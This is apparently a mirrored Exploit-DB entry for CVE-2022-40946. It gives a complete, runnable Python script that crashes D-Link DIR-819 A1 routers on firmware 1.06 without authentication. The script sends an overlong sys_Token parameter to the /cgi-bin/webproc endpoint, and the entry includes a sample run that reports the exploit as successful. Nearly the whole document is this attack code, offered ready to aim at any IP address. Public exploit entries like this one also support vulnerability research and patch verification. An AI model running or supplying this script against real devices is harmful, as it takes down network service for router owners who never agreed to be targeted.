DLink DIR 819 A1 – Denial of Service

• Exploit Database
• 15 阅读

• 作者： whokilleddb
  日期： 2023-03-25
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51053/

• # Exploit Title: DLink DIR 819 A1 - Denial of Service 
  # Date: 30th September, 2022
  # Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)
  # Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router
  # Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)
  # Tested on: Firmware Version - 1.06 Hardware Version - A1
  # CVE : CVE-2022-40946
  #
  # Github: https://github.com/whokilleddb/dlink-dir-819-dos
  #
  # $ ./exploit.py -i 192.168.0.1 
  # [+] DLink DIR-819 DoS exploit
  # [i] Address to attack: 192.168.0.1
  # [i] Using SSL: False
  # [i] Request Timeout: 30s
  # [i] Buffer Length: 19
  # [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522
  # [+] Exploit Successful!
  
  #!/usr/bin/env python3
  import sys
  import string
  import urllib3
  import requests
  import argparse
  import random
  import socket
  from rich import print
  
  
  # Disable SSL Warnings
  urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  
  
  # Globals
  TIMEOUT = 30
  #BUFFER_LEN = 19
  BUFFER_LEN = 32
  
  # Class to exploit
  class Exploit:
  def __init__(self, ip, is_ssl):
  """Initialize the constructor"""
  
  self.ip = ip
  self.is_ssl = is_ssl
   
  _payload = f"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}"
  
  if self.is_ssl:
  self.payload = f"https://{_payload}"
  else:
  self.payload = f"http://{_payload}"
  
  
  def show(self):
  """Show the parameters"""
  
  print(f"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]")
  print(f"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]")
  print(f"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]")
  print(f"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]")
  print(f"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]")
  
  
  def run(self):
  """Run the exploit"""
  print(f"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]")
  self.show()
  
  try:
  r = requests.get(self.payload, verify=False, timeout=TIMEOUT)
  if "Internal Error" in r.text:
  print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
  print(f"[bold][[green]+[/green]] Router services must be down![/bold]")
  else:
  print(f"[bold][[red]![/red]] Exploit Failed :([/bold]") 
  
  except requests.exceptions.Timeout:
  print(f"[bold][[green]+[/green]] Exploit Successful![/bold]")
  
  except Exception as e:
  print(f"Error occured as: {e}")
  
  
  def main():
  """Main function to run"""
  
  parser = argparse.ArgumentParser(
  description="DLink DIR-819 Unauthenticated DoS")
  parser.add_argument('-i', '--ip', required=True, help="IP of the router")
  parser.add_argument('-s', '--ssl', required=False, action="store_true")
  
  opts = parser.parse_args()
  
  try:
  ip = socket.gethostbyname(opts.ip)
  except socket.error:
  print("[bold red][!] Invalid IP address[/bold red]", file=sys.stderr)
  return
  
  is_ssl = opts.ssl
  
  exploit = Exploit(ip, is_ssl)
  exploit.run()
  
  
  if __name__ == '__main__':
  main()